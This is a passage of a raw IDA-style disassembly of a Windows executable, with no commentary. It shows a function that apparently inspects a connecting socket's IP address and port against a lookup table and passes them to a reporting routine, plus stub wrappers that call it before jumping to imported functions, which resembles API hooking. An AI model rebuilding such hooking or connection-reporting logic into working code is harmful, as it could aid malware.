loc_41FE57: ; CODE XREF: sub_41FC7E+204�j
; sub_41FC7E+21E�j ...
mov bl, 1
jmp loc_41FEF2
; ---------------------------------------------------------------------------
loc_41FE5E: ; CODE XREF: sub_41FC7E+1B5�j
push 4
pop ebx
cmp [ebp+arg_8], ebx
jnz loc_41FFC7
mov eax, dword_40FB34
push ebx
push ebx
push edi
push dword ptr [eax+14Ch]
call sub_41A493
add esp, 10h
test eax, eax
jz short loc_41FE57
mov eax, dword_40FB34
push ebx
push ebx
push edi
push dword ptr [eax+150h]
call sub_41A493
add esp, 10h
test eax, eax
jz short loc_41FE57
mov eax, dword_40FB34
push ebx
push ebx
push edi
push dword ptr [eax+154h]
call sub_41A493
add esp, 10h
test eax, eax
jz short loc_41FE57
mov eax, dword_40FB34
push ebx
push ebx
push edi
push dword ptr [eax+158h]
call sub_41A493
add esp, 10h
test eax, eax
jz short loc_41FEF0
mov eax, dword_40FB34
push ebx
push ebx
push edi
push dword ptr [eax+15Ch]
call sub_41A493
add esp, 10h
test eax, eax
jnz loc_41FFC7
loc_41FEF0: ; CODE XREF: sub_41FC7E+252�j
mov bl, 2
loc_41FEF2: ; CODE XREF: sub_41FC7E+1DB�j
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
mov [ebp+arg_8], 10h
call dword_40FCD0
test eax, eax
jnz short loc_41FF3F
lea eax, [ebp+var_18]
push eax
call sub_417324
test al, al
pop ecx
jnz short loc_41FF3F
cmp bl, 1
jnz short loc_41FF3F
mov eax, dword_40FB34
push 0FFFFFFFFh
push 0FFFFFFFFh
push dword ptr [eax+160h]
push dword ptr [esi+4]
call sub_41A493
add esp, 10h
test eax, eax
jnz short loc_41FFB3
loc_41FF3F: ; CODE XREF: sub_41FC7E+28E�j
; sub_41FC7E+29C�j ...
cmp bl, 2
jnz short loc_41FFAF
mov eax, dword_40FB34
mov edi, [eax+16Ch]
loc_41FF4F: ; CODE XREF: sub_41FC7E+340�j
movzx eax, [ebp+var_16]
mov ecx, [esi+8]
xor edx, edx
mov dh, al
shr eax, 8
or edx, eax
movzx eax, [ebp+var_11]
push edx
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_13]
push eax
movzx eax, [ebp+var_14]
push eax
push ecx
push dword ptr [esi+4]
push edi
push ecx
call dword_40FD94 ; lstrlenA
push dword ptr [esi+4]
mov edi, eax
call dword_40FD94 ; lstrlenA
lea eax, [edi+eax+32h]
push eax
mov eax, dword_40FB34
push dword ptr [eax+164h]
xor eax, eax
cmp bl, 1
setnz al
add eax, 3
push eax
call sub_41CAA9
add esp, 2Ch
loc_41FFAF: ; CODE XREF: sub_41FC7E+2C4�j
push 0
jmp short loc_41FFC1
; ---------------------------------------------------------------------------
loc_41FFB3: ; CODE XREF: sub_41FC7E+2BF�j
mov eax, dword_40FB34
mov edi, [eax+168h]
jmp short loc_41FF4F
; ---------------------------------------------------------------------------
loc_41FFC0: ; CODE XREF: sub_41FC7E+1A3�j
; sub_41FC7E+1AC�j
push eax
loc_41FFC1: ; CODE XREF: sub_41FC7E+333�j
call sub_41FBD7
pop ecx
loc_41FFC7: ; CODE XREF: sub_41FC7E+19A�j
; sub_41FC7E+1BF�j ...
push offset dword_410310
call dword_40FE88 ; RtlLeaveCriticalSection
loc_41FFD2: ; CODE XREF: sub_41FC7E+1C�j
; sub_41FC7E+25�j ...
pop edi
pop esi
loc_41FFD4: ; CODE XREF: sub_41FC7E+D�j
pop ebx
leave
retn
sub_41FC7E endp
; ---------------------------------------------------------------------------
db 0FFh
dd 0E8042474h, 0FFFFFC6Eh, 0BC25FF59h, 0FF0040FBh, 0E8042474h
dd 0FFFFFC5Eh, 0C025FF59h
db 0FCh, 40h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_41FC7E
add esp, 0Ch
pop ebp
jmp dword_40FCC8
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_41FC7E
add esp, 0Ch
pop ebp
jmp dword_40FCC4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_41FC7E
add esp, 0Ch
pop ebp
jmp dword_40FBB8
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_41FC7E
add esp, 0Ch
pop ebp
jmp dword_40FCCC
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_41FC7E
add esp, 0Ch
pop ebp
jmp dword_40FBB4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_41FC7E
add esp, 0Ch
pop ebp
jmp dword_40FCBC
; ---------------------------------------------------------------------------
align 4
dd 691h dup(0)
align 200h
_data ends
; Section 4. (virtual address 00023000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00022400
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 423000h
align 2000h
_idata2 ends
end start